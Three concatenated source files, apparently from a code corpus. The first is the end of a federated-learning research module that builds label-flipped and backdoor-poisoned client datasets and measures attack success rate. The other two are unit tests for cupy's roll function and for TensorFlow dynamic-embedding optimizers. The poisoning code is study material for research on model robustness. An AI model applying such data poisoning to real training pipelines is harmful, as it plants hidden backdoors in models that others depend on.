cor_local_idx = random.sample(range(0, num_of_local), int(num_of_local * cor_local_ratio))
num_of_label = len(set(y_train.tolist()))
    while True:
        cor_label_idx = random.sample(range(0, num_of_label), cor_minor_label_cnt)
        if target_label not in cor_label_idx:
            break
print('[*] Corrupted Label')
print(cor_label_idx, '->', target_label)
print('')
x_train_dict, y_train_dict = _create_backdoor_subsamples2(sample_dict_train, x_train, y_train, 'x_train', 'y_train',
cor_local_idx, cor_label_idx, target_label,
cor_major_data_ratio, cor_minor_data_ratio, dataset)
sample_dict_test = _get_non_iid_subsamples_indices(y_test, num_of_sample, pdist, seed)
x_test_dict, y_test_dict = _create_subsamples(sample_dict_test, x_test, y_test, 'x_test', 'y_test')
x_val_dict, y_val_dict = _create_backdoor_subsamples2(sample_dict_test, x_test, y_test, 'x_val', 'y_val',
cor_local_idx, cor_label_idx, target_label,
cor_major_data_ratio, cor_minor_data_ratio, dataset)
if verbose:
_print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict, x_val_dict, y_val_dict)
return x_train_dict, y_train_dict, x_test_dict, y_test_dict, x_val_dict, y_val_dict
def create_iid_samples(x_train, y_train, x_test, y_test, num_of_sample=10, seed=1, verbose=True):
sample_dict_train = _get_iid_subsamples_indices(y_train, num_of_sample, seed)
x_train_dict, y_train_dict = _create_subsamples(sample_dict_train, x_train, y_train,
'x_train', 'y_train')
sample_dict_test = _get_iid_subsamples_indices(y_test, num_of_sample, seed)
x_test_dict, y_test_dict = _create_subsamples(sample_dict_test, x_test, y_test,
'x_test', 'y_test')
if verbose:
_print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict)
return x_train_dict, y_train_dict, x_test_dict, y_test_dict
def create_corrupted_iid_samples(x_train, y_train, x_test, y_test,
cor_local_ratio=1.0, cor_label_ratio=0.2, cor_data_ratio=0.5, mode=1,
num_of_sample=10, seed=1, verbose=True, dataset='mnist'):
sample_dict_train = _get_iid_subsamples_indices(y_train, num_of_sample, seed)
x_train_dict, y_train_dict = _create_corrupted_subsamples(sample_dict_train, x_train, y_train,
'x_train', 'y_train',
cor_local_ratio, cor_label_ratio,
cor_data_ratio, mode)
sample_dict_test = _get_iid_subsamples_indices(y_test, num_of_sample, seed)
x_test_dict, y_test_dict = _create_subsamples(sample_dict_test, x_test, y_test,
'x_test', 'y_test')
if verbose:
_print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict)
return x_train_dict, y_train_dict, x_test_dict, y_test_dict
def create_backdoor_iid_samples(x_train, y_train, x_test, y_test,
cor_local_ratio=1.0, cor_label_ratio=0.2, cor_data_ratio=0.5, target_label=1,
num_of_sample=10, seed=1, verbose=True, dataset='mnist'):
sample_dict_train = _get_iid_subsamples_indices(y_train, num_of_sample, seed)
num_of_label = len(set(y_train.tolist()))
    while True:
        cor_label_idx = random.sample(range(0, num_of_label), int(num_of_label * cor_label_ratio))
        if target_label not in cor_label_idx:
            break
# temp = set(y_train.tolist())
# temp.difference_update(cor_label_idx)
print('[*] Corrupted Label')
print(cor_label_idx, '->', target_label)
print('')
x_train_dict, y_train_dict = _create_backdoor_subsamples(sample_dict_train, x_train, y_train, 'x_train', 'y_train',
cor_label_idx, target_label,
cor_local_ratio, cor_data_ratio, dataset)
sample_dict_test = _get_iid_subsamples_indices(y_test, num_of_sample, seed)
x_test_dict, y_test_dict = _create_subsamples(sample_dict_test, x_test, y_test,
'x_test', 'y_test')
x_val_dict, y_val_dict = _create_backdoor_subsamples(sample_dict_test, x_test, y_test, 'x_val', 'y_val',
cor_label_idx, target_label,
cor_local_ratio, cor_data_ratio, dataset)
if verbose:
_print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict, x_val_dict, y_val_dict)
return x_train_dict, y_train_dict, x_test_dict, y_test_dict, x_val_dict, y_val_dict
def create_dataloader(x_train, y_train, x_test, y_test, batch_size, dataset='mnist'):
train_data = None
test_data = None
if dataset=='mnist':
        if x_train is not None and y_train is not None:
            train_data = DataLoader(TensorDataset(x_train, y_train), batch_size=batch_size, shuffle=True)
        if x_test is not None and y_test is not None:
            test_data = DataLoader(TensorDataset(x_test, y_test), batch_size=1)
elif dataset=='fmnist':
workers=4
transform = transforms.Compose([transforms.ToPILImage(), transforms.Resize((35, 35)), transforms.ToTensor()])
        if x_train is not None and y_train is not None:
train_dataset = CustomTensorDataset(tensors=(x_train, y_train), transform=transform)
train_data = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size, shuffle=True,
# num_workers=workers, pin_memory=True
)
if x_test != None and y_test != None:
test_dataset = CustomTensorDataset(tensors=(x_test, y_test), transform=transform)
test_data = torch.utils.data.DataLoader(test_dataset,
batch_size=batch_size, shuffle=False,
# num_workers=workers, pin_memory=True
)
elif dataset=='cifar10':
workers=4
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
train_transform = transforms.Compose([transforms.ToPILImage(),
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(32, 4),
transforms.ToTensor(),
normalize
])
test_transform = transforms.Compose([transforms.ToPILImage(), transforms.ToTensor(),
normalize
])
if x_train != None and y_train != None:
train_dataset = CustomTensorDataset(tensors=(x_train, y_train), transform=train_transform)
train_data = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size, shuffle=True,
# num_workers=workers, pin_memory=True
)
if x_test != None and y_test != None:
test_dataset = CustomTensorDataset(tensors=(x_test, y_test), transform=test_transform)
test_data = torch.utils.data.DataLoader(test_dataset,
batch_size=batch_size, shuffle=False,
# num_workers=workers, pin_memory=True
)
return train_data, test_data
def cal_entropy(data):
    return entropy(data, base=len(data))
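`cal_entropy` passes `base=len(data)` to `scipy.stats.entropy`, which normalizes the result so a uniform distribution scores exactly 1.0. A minimal pure-Python sketch of the same normalization (the `normalized_entropy` name is ours, and unlike scipy it assumes the input is already a probability vector):

```python
import math

def normalized_entropy(probs):
    # Shannon entropy with log base len(probs):
    # 1.0 for a uniform distribution, 0.0 for a one-hot one.
    n = len(probs)
    return -sum(p * math.log(p, n) for p in probs if p > 0)

print(normalized_entropy([0.25, 0.25, 0.25, 0.25]))  # uniform -> 1.0
```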
def cal_asr(model, test_y_dict, valid_X_dict, valid_y_dict, target_label, dataset='mnist'):
    s_cnt = 0
    t_cnt = 0
    for i, (y, v_x, v_y) in enumerate(zip(test_y_dict, valid_X_dict, valid_y_dict)):
        te_y = test_y_dict[y]
        val_X = valid_X_dict[v_x].float()
        val_y = valid_y_dict[v_y]
        if dataset == 'cifar10':
            normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
            test_transform = transforms.Compose([
                transforms.ToPILImage(),
                transforms.ToTensor(),
                normalize
            ])
            val_dataset = CustomTensorDataset(tensors=(val_X, val_y), transform=test_transform)
            val_data = torch.utils.data.DataLoader(val_dataset,
                                                   batch_size=len(val_X), shuffle=False)
            val_X = next(iter(val_data))[0]
            val_y = next(iter(val_data))[1]
        elif dataset == 'fmnist':
            transform = transforms.Compose(
                [transforms.ToPILImage(), transforms.Resize((35, 35)), transforms.ToTensor()])
            val_dataset = CustomTensorDataset(tensors=(val_X, val_y), transform=transform)
            val_data = torch.utils.data.DataLoader(val_dataset, batch_size=len(val_X), shuffle=False)
            val_X = next(iter(val_data))[0]
            val_y = next(iter(val_data))[1]
        if use_cuda:
            val_X = val_X.float().cuda()
            val_y = val_y.cuda()
        pred_val_y = model(val_X).argmax(dim=1)
        # Count only samples whose label was flipped (te_y != val_y); among those,
        # a "success" is a prediction equal to the attacker's target label.
        for idx in range(len(te_y)):
            if te_y[idx] != val_y[idx]:
                if int(pred_val_y[idx]) == target_label:
                    s_cnt += 1
                t_cnt += 1
    if t_cnt == 0:
        asr = 0.0
    else:
        asr = float(s_cnt) / float(t_cnt)
    print('\n- Attack Success Rate: {} ({}/{})'.format(asr, s_cnt, t_cnt))
    return asr
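The final ratio in `cal_asr` can be isolated as a tiny helper (a sketch; the `attack_success_rate` name is ours, not part of the module above):

```python
def attack_success_rate(s_cnt, t_cnt):
    # Fraction of label-flipped samples the model predicts as the target label.
    # Returns 0.0 when no samples were targeted, avoiding ZeroDivisionError.
    return 0.0 if t_cnt == 0 else s_cnt / t_cnt

print(attack_success_rate(3, 4))  # 0.75
print(attack_success_rate(0, 0))  # 0.0
```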
def adjust_learning_rate(lr, optimizer, epoch):
    """Sets the learning rate to the initial LR halved every 30 epochs."""
    new_lr = lr * (0.5 ** (epoch // 30))
    for param_group in optimizer.param_groups:
        param_group['lr'] = new_lr
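The schedule itself is a pure function of the epoch, which makes it easy to check in isolation (a sketch; `decayed_lr` is a hypothetical helper mirroring the formula above, without the optimizer plumbing):

```python
def decayed_lr(base_lr, epoch):
    # Same step schedule as adjust_learning_rate: halve every 30 epochs.
    return base_lr * (0.5 ** (epoch // 30))

print([decayed_lr(0.1, e) for e in (0, 29, 30, 60)])
```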
def arg_parse():
    def _str2bool(v):
        if v.lower() in ('yes', 'true', 't', 'y', '1'):
            return True
        elif v.lower() in ('no', 'false', 'f', 'n', '0'):
            return False
        else:
            raise argparse.ArgumentTypeError('Boolean value expected.')

    parser = argparse.ArgumentParser()
    parser.add_argument('--dataset', '-d', default='mnist', dest='dataset',
                        help='Dataset [mnist|fmnist|cifar10]')
    parser.add_argument('--model', '-m', default=['central', 'federate'], dest='model', nargs='*',
                        help='Model list [central, federate]')
    parser.add_argument('--corrupt', '-c', default='True', dest='corrupt',
                        help='Data Corruption [True|False]')
    args = parser.parse_args()
    corrupt = _str2bool(args.corrupt)
    return args.dataset, args.model, not corrupt, not corrupt
if __name__ == '__main__':
    tr_X, tr_y, te_X, te_y = load_mnist_data()
    tr_X_iid_dict, tr_y_iid_dict, te_X_iid_dict, te_y_iid_dict = create_corrupted_iid_samples(
        tr_X, tr_y, te_X, te_y,
        cor_local_ratio=1.0, cor_label_ratio=0.2, cor_data_ratio=0.5, mode=2,
        num_of_sample=10, seed=1, verbose=True
    )
    tr_X_iid_dict, tr_y_iid_dict, te_X_iid_dict, te_y_iid_dict = create_corrupted_non_iid_samples(
        tr_X, tr_y, te_X, te_y,
        cor_local_ratio=1.0,
        cor_minor_label_cnt=1,
        cor_major_data_ratio=0.2,
        cor_minor_data_ratio=0.5, mode=1,
        num_of_sample=10, seed=1, verbose=True
    )
# File: tests/cupy_tests/manipulation_tests/test_rearrange.py
# Repo: PhysicsTeacher13/CHAINER (BSD-3-Clause)
import unittest
from cupy import testing


@testing.gpu
class TestRearrange(unittest.TestCase):

    _multiprocess_can_split_ = True

    @testing.for_all_dtypes()
    @testing.numpy_cupy_array_equal(accept_error=TypeError)
    def test_roll(self, xp, dtype):
        x = xp.arange(10, dtype)
        return xp.roll(x, 2)

    @testing.for_all_dtypes()
    @testing.numpy_cupy_array_equal()
    def test_roll2(self, xp, dtype):
        x = testing.shaped_arange((5, 2), xp, dtype)
        return xp.roll(x, 1)

    @testing.for_all_dtypes()
    @testing.numpy_cupy_array_equal()
    def test_roll_negative(self, xp, dtype):
        x = testing.shaped_arange((5, 2), xp, dtype)
        return xp.roll(x, -2)

    @testing.for_all_dtypes()
    @testing.numpy_cupy_array_equal()
    def test_roll_with_axis(self, xp, dtype):
        x = testing.shaped_arange((5, 2), xp, dtype)
        return xp.roll(x, 1, axis=0)

    @testing.for_all_dtypes()
    @testing.numpy_cupy_array_equal()
    def test_roll_with_negative_axis(self, xp, dtype):
        x = testing.shaped_arange((5, 2), xp, dtype)
        return xp.roll(x, 1, axis=-1)

    @testing.for_all_dtypes()
    @testing.numpy_cupy_array_equal()
    def test_roll_double_shift(self, xp, dtype):
        x = testing.shaped_arange((10,), xp, dtype)
        return xp.roll(x, 35)

    @testing.for_all_dtypes()
    @testing.numpy_cupy_array_equal()
    def test_roll_double_shift_with_axis(self, xp, dtype):
        x = testing.shaped_arange((5, 2), xp, dtype)
        return xp.roll(x, 11, axis=0)

    @testing.for_all_dtypes()
    @testing.numpy_cupy_array_equal()
    def test_roll_zero_array(self, xp, dtype):
        x = testing.shaped_arange((), xp, dtype)
        return xp.roll(x, 5)

    @testing.for_all_dtypes()
    @testing.numpy_cupy_raises()
    def test_roll_invalid_axis(self, xp, dtype):
        x = testing.shaped_arange((5, 2), xp, dtype)
        return xp.roll(x, 1, axis=2)

    @testing.for_all_dtypes()
    @testing.numpy_cupy_raises()
    def test_roll_invalid_negative_axis(self, xp, dtype):
        x = testing.shaped_arange((5, 2), xp, dtype)
        return xp.roll(x, 1, axis=-3)
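The semantics these tests pin down (shifts wrap modulo the length, so a shift of 35 on a length-10 array equals a shift of 5, and negative shifts roll the other way) can be sketched in plain Python. This is a hypothetical 1-D list analogue for illustration, not cupy's implementation:

```python
def roll(seq, shift):
    # Minimal 1-D analogue of numpy/cupy roll on a Python list.
    n = len(seq)
    if n == 0:
        return list(seq)
    shift %= n  # shifts larger than the length (or negative) wrap around
    return list(seq[n - shift:]) + list(seq[:n - shift])

print(roll(list(range(10)), 2))   # [8, 9, 0, 1, 2, 3, 4, 5, 6, 7]
print(roll(list(range(10)), 35) == roll(list(range(10)), 5))  # True
```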
# File: tensorflow_recommenders_addons/dynamic_embedding/python/kernel_tests/dynamic_embedding_optimizer_test.py
# Repo: yuanqingsunny/recommenders-addons (Apache-2.0)
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""unit tests of dynamic embedding ops
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import itertools
import numpy as np
import os
import tensorflow as tf
from tensorflow_recommenders_addons import dynamic_embedding as de
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import test_util
from tensorflow.python.keras import optimizer_v2
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import adadelta
from tensorflow.python.training import adagrad
from tensorflow.python.training import adagrad_da
from tensorflow.python.training import adam
from tensorflow.python.training import ftrl
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import momentum
from tensorflow.python.training import monitored_session
from tensorflow.python.training import proximal_adagrad
from tensorflow.python.training import proximal_gradient_descent as pgd
from tensorflow.python.training import rmsprop
from tensorflow.python.training import training_util
# pylint: disable=missing-class-docstring
# pylint: disable=missing-function-docstring
def _type_converter(tf_type):
  mapper = {
      dtypes.int32: np.int32,
      dtypes.int64: np.int64,
      dtypes.float32: np.float32,
      dtypes.float64: np.float64,
  }
  return mapper[tf_type]
def _get_devices():
  return ["/gpu:0" if test_util.is_gpu_available() else "/cpu:0"]


def _check_device(op, expected_device="gpu"):
  return expected_device.upper() in op.device
def _test_dir(temp_dir, test_name):
  """Create an empty dir to use for tests.

  Args:
    temp_dir: Tmp directory path.
    test_name: Name of the test.

  Returns:
    Absolute path to the test directory.
  """
  test_dir = os.path.join(temp_dir, test_name)
  if os.path.isdir(test_dir):
    for f in glob.glob("%s/*" % test_dir):
      os.remove(f)
  else:
    os.makedirs(test_dir)
  return test_dir
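`_test_dir` guarantees an empty directory whether or not it already exists: an existing directory is emptied of files, a missing one is created. A self-contained sketch of the same idiom (`fresh_test_dir` is our illustrative name, using `tempfile` instead of the test harness's temp dir):

```python
import glob
import os
import tempfile


def fresh_test_dir(temp_dir, test_name):
    # Mirror of _test_dir above: empty the dir if it exists, else create it.
    d = os.path.join(temp_dir, test_name)
    if os.path.isdir(d):
        for f in glob.glob("%s/*" % d):
            os.remove(f)
    else:
        os.makedirs(d)
    return d


base = tempfile.mkdtemp()
d = fresh_test_dir(base, "demo")
print(os.path.isdir(d), os.listdir(d))  # True []
```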
default_config = config_pb2.ConfigProto(
    allow_soft_placement=False,
    gpu_options=config_pb2.GPUOptions(allow_growth=True))
class CommonTrainableTestV1Base(object):

  def common_minimize_trainable(self, base_opt, test_opt, name):
    raise NotImplementedError

  def device_check(self, de):
    if test_util.is_gpu_available():
      self.assertTrue("GPU" in de.tables[0].resource_handle.device.upper())

  @test_util.deprecated_graph_mode_only
  def test_adadelta_minimize_trainable(self):
    base_opt = adadelta.AdadeltaOptimizer(1.0)
    test_opt = adadelta.AdadeltaOptimizer(1.0)
    self.common_minimize_trainable(base_opt, test_opt, name="adadelta")

  @test_util.deprecated_graph_mode_only
  def test_adagrad_minimize_trainable(self):
    base_opt = adagrad.AdagradOptimizer(1.0)
    test_opt = adagrad.AdagradOptimizer(1.0)
    self.common_minimize_trainable(base_opt, test_opt, name="adagrad")

  @test_util.deprecated_graph_mode_only
  def test_adagradda_minimize_trainable(self):
    base_gs = training_util.create_global_step()
    base_opt = adagrad_da.AdagradDAOptimizer(1.0, base_gs)
    test_opt = adagrad_da.AdagradDAOptimizer(1.0, base_gs)
    self.common_minimize_trainable(base_opt, test_opt, name="adagrad_da")

  @test_util.deprecated_graph_mode_only
  def test_ftrl_minimize_trainable(self):
    base_opt = ftrl.FtrlOptimizer(1.0)
    test_opt = ftrl.FtrlOptimizer(1.0)
    self.common_minimize_trainable(base_opt, test_opt, name="ftrl")

  @test_util.deprecated_graph_mode_only
  def test_proximal_adagrad_minimize_trainable(self):
    base_opt = proximal_adagrad.ProximalAdagradOptimizer(1.0)
    test_opt = proximal_adagrad.ProximalAdagradOptimizer(1.0)
    self.common_minimize_trainable(base_opt, test_opt, name="proximal_adagrad")

  @test_util.deprecated_graph_mode_only
  def test_proximalsgd_minimize_trainable(self):
    base_opt = pgd.ProximalGradientDescentOptimizer(1.0)
    test_opt = pgd.ProximalGradientDescentOptimizer(1.0)
    self.common_minimize_trainable(base_opt, test_opt, name="proximal_sgd")

  @test_util.deprecated_graph_mode_only
  def test_momentum_minimize_trainable(self):
    base_opt = momentum.MomentumOptimizer(1.0, momentum=0.9)
    test_opt = momentum.MomentumOptimizer(1.0, momentum=0.9)
    self.common_minimize_trainable(base_opt, test_opt, name="momentum")

  @test_util.deprecated_graph_mode_only
  def test_sgd_minimize_trainable(self):
    base_opt = gradient_descent.GradientDescentOptimizer(1.0)
    test_opt = gradient_descent.GradientDescentOptimizer(1.0)
    self.common_minimize_trainable(base_opt, test_opt, name="sgd")

  @test_util.deprecated_graph_mode_only
  def test_adam_minimize_trainable(self):
    base_opt = adam.AdamOptimizer(1.0)
    test_opt = adam.AdamOptimizer(1.0)
    self.common_minimize_trainable(base_opt, test_opt, name="adam")

  @test_util.deprecated_graph_mode_only
  def test_rmsprop_minimize_trainable(self):
    for centered_ in [False, True]:
      base_opt = rmsprop.RMSPropOptimizer(1.0, centered=centered_)
      test_opt = rmsprop.RMSPropOptimizer(1.0, centered=centered_)
      self.common_minimize_trainable(base_opt,
                                     test_opt,
                                     name="rmsprop" + str(centered_))
class CommonTrainableTestV2Base(object):

  def common_minimize_trainable_v2(self, base_opt, test_opt, name):
    raise NotImplementedError

  def device_check(self, de):
    if test_util.is_gpu_available():
      self.assertTrue("GPU" in de.tables[0].resource_handle.device.upper())

  @test_util.run_in_graph_and_eager_modes
  def test_adadelta_v2_minimize_trainable(self):
    if test_util.is_gpu_available():
      self.skipTest("Skip GPU Test for no GPU kernel.")
    base_opt = optimizer_v2.adadelta.Adadelta(1.0)
    test_opt = optimizer_v2.adadelta.Adadelta(1.0)
    self.common_minimize_trainable_v2(base_opt, test_opt, name="adadelta")

  @test_util.run_in_graph_and_eager_modes
  def test_adagrad_v2_minimize_trainable(self):
    if test_util.is_gpu_available():
      self.skipTest("Skip GPU Test for no GPU kernel.")
    base_opt = optimizer_v2.adagrad.Adagrad(1.0)
    test_opt = optimizer_v2.adagrad.Adagrad(1.0)
    self.common_minimize_trainable_v2(base_opt, test_opt, name="adagrad")

  @test_util.run_in_graph_and_eager_modes
  def test_adam_v2_minimize_trainable(self):
    base_opt = optimizer_v2.adam.Adam(1.0)
    test_opt = optimizer_v2.adam.Adam(1.0)
    self.common_minimize_trainable_v2(base_opt, test_opt, name="adam")

  @test_util.run_in_graph_and_eager_modes
  def test_adamax_v2_minimize_trainable(self):
    if test_util.is_gpu_available():
      self.skipTest("Skip GPU Test for GPU kernel has bug.")
    base_opt = optimizer_v2.adamax.Adamax(1.0)
    test_opt = optimizer_v2.adamax.Adamax(1.0)
    self.common_minimize_trainable_v2(base_opt, test_opt, name="adamax")

  @test_util.run_in_graph_and_eager_modes
  def test_ftrl_v2_minimize_trainable(self):
    if test_util.is_gpu_available():
      self.skipTest("Skip GPU Test for no GPU kernel.")
    base_opt = optimizer_v2.ftrl.Ftrl(1.0)
    test_opt = optimizer_v2.ftrl.Ftrl(1.0)
    self.common_minimize_trainable_v2(base_opt, test_opt, name="ftrl")

  @test_util.run_in_graph_and_eager_modes
  def test_sgd_v2_minimize_trainable(self):
    base_opt = optimizer_v2.gradient_descent.SGD(1.0)
    test_opt = optimizer_v2.gradient_descent.SGD(1.0)
    self.common_minimize_trainable_v2(base_opt, test_opt, name="sgd")

  @test_util.run_in_graph_and_eager_modes
  def test_nadam_v2_minimize_trainable(self):
    base_opt = optimizer_v2.nadam.Nadam(1.0)
    test_opt = optimizer_v2.nadam.Nadam(1.0)
    self.common_minimize_trainable_v2(base_opt, test_opt, name="Nadam")

  @test_util.run_in_graph_and_eager_modes
  def test_rmsprop_v2_minimize_trainable(self):
    base_opt = optimizer_v2.rmsprop.RMSprop(1.0)
    test_opt = optimizer_v2.rmsprop.RMSprop(1.0)
    self.common_minimize_trainable_v2(base_opt, test_opt, name="rmsprop")
class EmbeddingLookupTrainableV1Test(test.TestCase, CommonTrainableTestV1Base):

  def common_minimize_trainable(self, base_opt, test_opt, name):
    de.enable_train_mode()
    base_opt = de.DynamicEmbeddingOptimizer(base_opt)
    test_opt = de.DynamicEmbeddingOptimizer(test_opt)
    id = 0
    for (num_shards, k_dtype, d_dtype, initial_mode, dim,
         run_step) in itertools.product(
             [1, 2],
             [dtypes.int64],
             [dtypes.float32],
             ["constant"],
             [1, 10],
             [10],
         ):
      id += 1
      with self.session(use_gpu=test_util.is_gpu_available(),
                        config=default_config) as sess:
        # common define
        raw_init_ids = [0, 1]
        raw_init_vals = np.random.rand(2, dim)
        raw_ids = [0]
        x = constant_op.constant(np.random.rand(dim, len(raw_ids)),
                                 dtype=d_dtype)
        # base graph
        base_var = resource_variable_ops.ResourceVariable(raw_init_vals,
                                                          dtype=d_dtype)
        ids = constant_op.constant(raw_ids, dtype=k_dtype)
        pred0 = math_ops.matmul(embedding_ops.embedding_lookup([base_var], ids),
                                x)
        loss0 = pred0 * pred0
        base_opt_op = base_opt.minimize(loss0)
        # test graph
        embeddings = de.get_variable(
            "t2020-" + name + str(id),
            key_dtype=k_dtype,
            value_dtype=d_dtype,
            devices=_get_devices() * num_shards,
            initializer=1.0,
            dim=dim,
        )
        self.device_check(embeddings)
        init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
        init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
        init_op = embeddings.upsert(init_ids, init_vals)
        self.evaluate(init_op)
        test_var, trainable = de.embedding_lookup([embeddings],
                                                  ids,
                                                  return_trainable=True)
        pred1 = math_ops.matmul(test_var, x)
        loss1 = pred1 * pred1
        test_opt_op = test_opt.minimize(loss1, var_list=[trainable])
        self.evaluate(variables.global_variables_initializer())
        for _ in range(run_step):
          sess.run(base_opt_op)
        # Fetch params to validate initial values
        self.assertAllCloseAccordingToType(raw_init_vals[raw_ids],
                                           self.evaluate(test_var))
        # Run `run_step` step of sgd
        for _ in range(run_step):
          sess.run(test_opt_op)
        table_var = embeddings.lookup(ids)
        # Validate updated params
        self.assertAllCloseAccordingToType(
            self.evaluate(base_var)[raw_ids],
            self.evaluate(table_var),
            msg="Cond:{},{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
                                                initial_mode, dim, run_step),
        )
class EmbeddingLookupTrainableV2Test(test.TestCase, CommonTrainableTestV2Base):

  def common_minimize_trainable_v2(self, base_opt, test_opt, name):
    de.enable_train_mode()
    tf.config.set_soft_device_placement(True)
    base_opt = de.DynamicEmbeddingOptimizer(base_opt)
    test_opt = de.DynamicEmbeddingOptimizer(test_opt)
    id = 0
    for (num_shards, k_dtype, d_dtype, initial_mode, dim,
         run_step) in itertools.product(
             [1, 2],
             [dtypes.int64],
             [dtypes.float32],
             ["constant"],
             [1, 10],
             [10],
         ):
      id += 1
      # common define
      raw_init_ids = [0, 1]
      raw_init_vals = np.random.rand(2, dim)
      raw_ids = [0]

      # base graph
      def base_fn():
        embeddings = resource_variable_ops.ResourceVariable(raw_init_vals,
                                                            dtype=d_dtype)

        def loss_fn(emb):
          ids = constant_op.constant(raw_ids, dtype=k_dtype)
          pred = embedding_ops.embedding_lookup([emb], ids)
          return pred * pred

        base_opt_op = base_opt.minimize(lambda: loss_fn(embeddings),
                                        [embeddings])
        self.evaluate(variables.global_variables_initializer())
        for _ in range(run_step):
          self.evaluate(base_opt_op)
        return embeddings

      base_opt_val = self.evaluate(base_fn())

      def test_fn():
        embeddings = de.get_variable(
            "t2020-v2-" + name + str(id),
            key_dtype=k_dtype,
            value_dtype=d_dtype,
            devices=_get_devices() * num_shards,
            initializer=1.0,
            dim=dim,
        )
        self.device_check(embeddings)
        trainables = []
        init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
        init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
        self.evaluate(embeddings.upsert(init_ids, init_vals))

        def var_fn():
          return trainables

        def loss_fn(x, trainables):
          ids = constant_op.constant(raw_ids, dtype=k_dtype)
          pred, trainable = de.embedding_lookup([x], ids, return_trainable=True)
          trainables.clear()
          trainables.append(trainable)
          return pred * pred

        test_opt_op = test_opt.minimize(lambda: loss_fn(embeddings, trainables),
                                        var_fn)
        self.evaluate(variables.global_variables_initializer())
        for _ in range(run_step):
          self.evaluate(test_opt_op)
        return embeddings.lookup(init_ids)

      with ops.device(_get_devices()[0]):
        test_opt_val = self.evaluate(test_fn())
      self.assertAllCloseAccordingToType(
          base_opt_val,
          test_opt_val,
          msg="Cond:{},{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
                                              initial_mode, dim, run_step),
      )
class EmbeddingLookupUniqueTrainableV1Test(test.TestCase,
                                           CommonTrainableTestV1Base):

  def common_minimize_trainable(self, base_opt, test_opt, name):
    de.enable_train_mode()
    base_opt = de.DynamicEmbeddingOptimizer(base_opt)
    test_opt = de.DynamicEmbeddingOptimizer(test_opt)
    id = 0
    for (num_shards, k_dtype, d_dtype, initial_mode, dim,
         run_step) in itertools.product(
             [1, 2],
             [dtypes.int64],
             [dtypes.float32],
             ["constant"],
             [1, 10],
             [10],
         ):
      id += 1
      with self.session(use_gpu=test_util.is_gpu_available(),
                        config=default_config) as sess:
        # common define
        raw_init_ids = [0, 1, 2, 3, 4]
        raw_init_vals = np.random.rand(5, dim)
        raw_ids = [0, 1, 1, 2, 3, 4, 4]
        x = constant_op.constant(np.random.rand(dim, len(raw_ids)),
                                 dtype=d_dtype)
        # base graph
        ids = constant_op.constant(raw_ids, dtype=k_dtype)
        base_var = resource_variable_ops.ResourceVariable(raw_init_vals,
                                                          dtype=d_dtype)
        unique_ids, idx = array_ops.unique(ids)
        unique_embeddings = embedding_ops.embedding_lookup([base_var],
                                                           unique_ids)
        embeddings = array_ops.gather(unique_embeddings, idx)
        pred0 = math_ops.matmul(embeddings, x)
        loss0 = pred0 * pred0
        base_opt_op = base_opt.minimize(loss0)
        # test graph
        embeddings = de.get_variable(
            "t-embedding_lookup_unique-v1-" + name + str(id),
            key_dtype=k_dtype,
            value_dtype=d_dtype,
            devices=_get_devices() * num_shards,
            initializer=1.0,
            dim=dim,
        )
        self.device_check(embeddings)
        init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
        init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
        init_op = embeddings.upsert(init_ids, init_vals)
        self.evaluate(init_op)
        test_var, trainable = de.embedding_lookup_unique([embeddings],
                                                         ids,
                                                         return_trainable=True)
        pred1 = math_ops.matmul(test_var, x)
        loss1 = pred1 * pred1
        test_opt_op = test_opt.minimize(loss1, var_list=[trainable])
        self.evaluate(variables.global_variables_initializer())
        for _ in range(run_step):
          sess.run(base_opt_op)
        # Fetch params to validate initial values
        self.assertAllCloseAccordingToType(raw_init_vals[raw_ids],
                                           self.evaluate(test_var))
        # Run `run_step` step of sgd
        for _ in range(run_step):
          sess.run(test_opt_op)
        table_var = embeddings.lookup(ids)
        # Validate updated params
        self.assertAllCloseAccordingToType(
            self.evaluate(base_var)[raw_ids],
            self.evaluate(table_var),
            msg="Cond:{},{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
                                                initial_mode, dim, run_step),
        )
class EmbeddingLookupUniqueTrainableV2Test(test.TestCase,
                                           CommonTrainableTestV2Base):

  def common_minimize_trainable_v2(self, base_opt, test_opt, name):
    de.enable_train_mode()
    base_opt = de.DynamicEmbeddingOptimizer(base_opt)
    test_opt = de.DynamicEmbeddingOptimizer(test_opt)
    id = 0
    for (num_shards, k_dtype, d_dtype, initial_mode, dim,
         run_step) in itertools.product(
             [1, 2],
             [dtypes.int64],
             [dtypes.float32],
             ["constant"],
             [1, 10],
             [10],
         ):
      id += 1
      # common define
